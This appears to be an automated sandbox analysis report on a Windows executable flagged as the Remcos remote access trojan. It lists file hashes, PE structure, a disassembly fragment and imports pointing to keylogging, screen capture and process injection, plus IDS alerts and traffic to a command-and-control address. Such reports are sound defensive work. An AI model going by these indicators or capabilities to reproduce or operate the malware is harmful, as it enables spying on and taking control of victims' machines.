                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):122218
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                                            MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                                            SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                                            SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                                            SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):291
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                            MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                            SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                            SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                            SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):130866
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                                            MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                                            SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                                            SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                                            SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):154477
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1753
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                            MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                            SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                            SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                            SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):9815
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                            MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                            SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                            SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                            SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                            MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                            SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                            SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                            SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):962
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                            MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                            SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                            SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                            SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.586523892276906
                                                                                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                            File name:17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File size:493'056 bytes
                                                                                                                                                                                                                                                                                                                            MD5:41496241ae1ad7c561d749f7d479caff
                                                                                                                                                                                                                                                                                                                            SHA1:e2935d471b03f8efc40460d29e2c07ee5a26f8de
                                                                                                                                                                                                                                                                                                                            SHA256:ad4a934328e699a5065c7c55ab3399d74134b5e97401175948b5296faf98d2a8
                                                                                                                                                                                                                                                                                                                            SHA512:50f27e89d4167087e60a251189766cabd71e81b52713d99687cf8aa70ceb220c450a175bc1559bd4e981fcb1fe3c4ee59ced8c0501abf5f234f336e318563fe7
                                                                                                                                                                                                                                                                                                                            SSDEEP:12288:79PgP3HAMwIGjY4vce6lnBthn5HSRVMf139F5woxr+IwtHwBtFhCsvZD54j+P32:p43HfwIGYMcn5PJrZa+
                                                                                                                                                                                                                                                                                                                            TLSH:B4A4BE01B6D2C072D57625300D26E775DEBDBD212835897BB3DA1D67FE30180E63AAB2
                                                                                                                                                                                                                                                                                                                            Icon Hash:95694d05214c1b33
                                                                                                                                                                                                                                                                                                                            Entrypoint:0x433b4a
                                                                                                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                            Time Stamp:0x6752B172 [Fri Dec 6 08:10:26 2024 UTC]
                                                                                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                                            Import Hash:e77512f955eaf60ccff45e02d69234de
                                                                                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                                                                                            call 00007F1A84529683h
                                                                                                                                                                                                                                                                                                                            jmp 00007F1A84528FDFh
                                                                                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                                                                                            sub esp, 00000324h
                                                                                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                                                                                            push 00000017h
                                                                                                                                                                                                                                                                                                                            call 00007F1A8454B4B9h
                                                                                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                                                                                            je 00007F1A84529167h
                                                                                                                                                                                                                                                                                                                            mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                            int 29h
                                                                                                                                                                                                                                                                                                                            push 00000003h
                                                                                                                                                                                                                                                                                                                            call 00007F1A84529324h
                                                                                                                                                                                                                                                                                                                            mov dword ptr [esp], 000002CCh
                                                                                                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                                                                                                                                            push eax
call 00007F1A8452B63Bh
add esp, 0Ch
mov dword ptr [ebp-00000274h], eax
mov dword ptr [ebp-00000278h], ecx
mov dword ptr [ebp-0000027Ch], edx
mov dword ptr [ebp-00000280h], ebx
mov dword ptr [ebp-00000284h], esi
mov dword ptr [ebp-00000288h], edi
mov word ptr [ebp-0000025Ch], ss
mov word ptr [ebp-00000268h], cs
mov word ptr [ebp-0000028Ch], ds
mov word ptr [ebp-00000290h], es
mov word ptr [ebp-00000294h], fs
mov word ptr [ebp-00000298h], gs
pushfd
pop dword ptr [ebp-00000264h]
mov eax, dword ptr [ebp+04h]
mov dword ptr [ebp-0000026Ch], eax
lea eax, dword ptr [ebp+04h]
mov dword ptr [ebp-00000260h], eax
mov dword ptr [ebp-00000324h], 00010001h
mov eax, dword ptr [eax-04h]
push 00000050h
mov dword ptr [ebp-00000270h], eax
lea eax, dword ptr [ebp-58h]
push 00000000h
push eax
call 00007F1A8452B5B1h
Programming Language:
• [C++] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e020 | 0x104 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x4a88 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7b000 | 0x3b88 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6c510 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x6c5e8 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6c548 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x57000 | 0x4f4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x55f2d | 0x56000 | c9fb1fecb5f01a3c88e2bc00eccd57c4 | False | 0.5739377043968024 | data | 6.621523378040251 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x57000 | 0x18b00 | 0x18c00 | 0ba285a9a28b1dec254a7539ab18f8d0 | False | 0.4981455176767677 | OpenPGP Secret Key Version 6 | 5.75873851406894 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x70000 | 0x5d8c | 0xe00 | 06414e748130e7e668ba2ba172d63448 | False | 0.22684151785714285 | data | 3.093339598098017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x76000 | 0x4a88 | 0x4c00 | f18524fdc8b743efff9e115a0b2ab0b6 | False | 0.2731805098684211 | data | 3.97540491360943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x7b000 | 0x3b88 | 0x3c00 | b875bbd60cc90da8a22f40034fe9606e | False | 0.7575520833333333 | data | 6.702930468027394 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x7618c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837 |
| RT_ICON | 0x765f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27704918032786885 |
| RT_ICON | 0x76f7c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.23686679174484052 |
| RT_ICON | 0x78024 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.22977178423236513 |
| RT_RCDATA | 0x7a5cc | 0x47a | data | | | 1.0095986038394416 |
| RT_GROUP_ICON | 0x7aa48 | 0x3e | data | English | United States | 0.8064516129032258 |
| DLL | Import |
|---|---|
| KERNEL32.dll | ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile |
| USER32.dll | DefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon |
| GDI32.dll | BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject |
| ADVAPI32.dll | LookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW |
| SHELL32.dll | ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW |
| ole32.dll | CoInitializeEx, CoGetObject, CoUninitialize |
| SHLWAPI.dll | StrToIntA, PathFileExistsW, PathFileExistsA |
| WINMM.dll | mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW |
| WS2_32.dll | send, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname |
| urlmon.dll | URLOpenBlockingStreamW, URLDownloadToFileW |
| gdiplus.dll | GdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage |
| WININET.dll | InternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile |
| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-05T08:39:01.391447+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49709 | 195.133.78.18 | 7346 | TCP |
| 2025-01-05T08:39:02.625764+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49711 | 195.133.78.18 | 7346 | TCP |
| 2025-01-05T08:39:02.625991+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49710 | 195.133.78.18 | 7346 | TCP |
| 2025-01-05T08:39:03.736476+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49712 | 178.237.33.50 | 80 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.068723917 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.068746090 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.068792105 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.072592974 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.108046055 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.112993956 CET8049712178.237.33.50192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.113118887 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.113303900 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.118052959 CET8049712178.237.33.50192.168.2.6
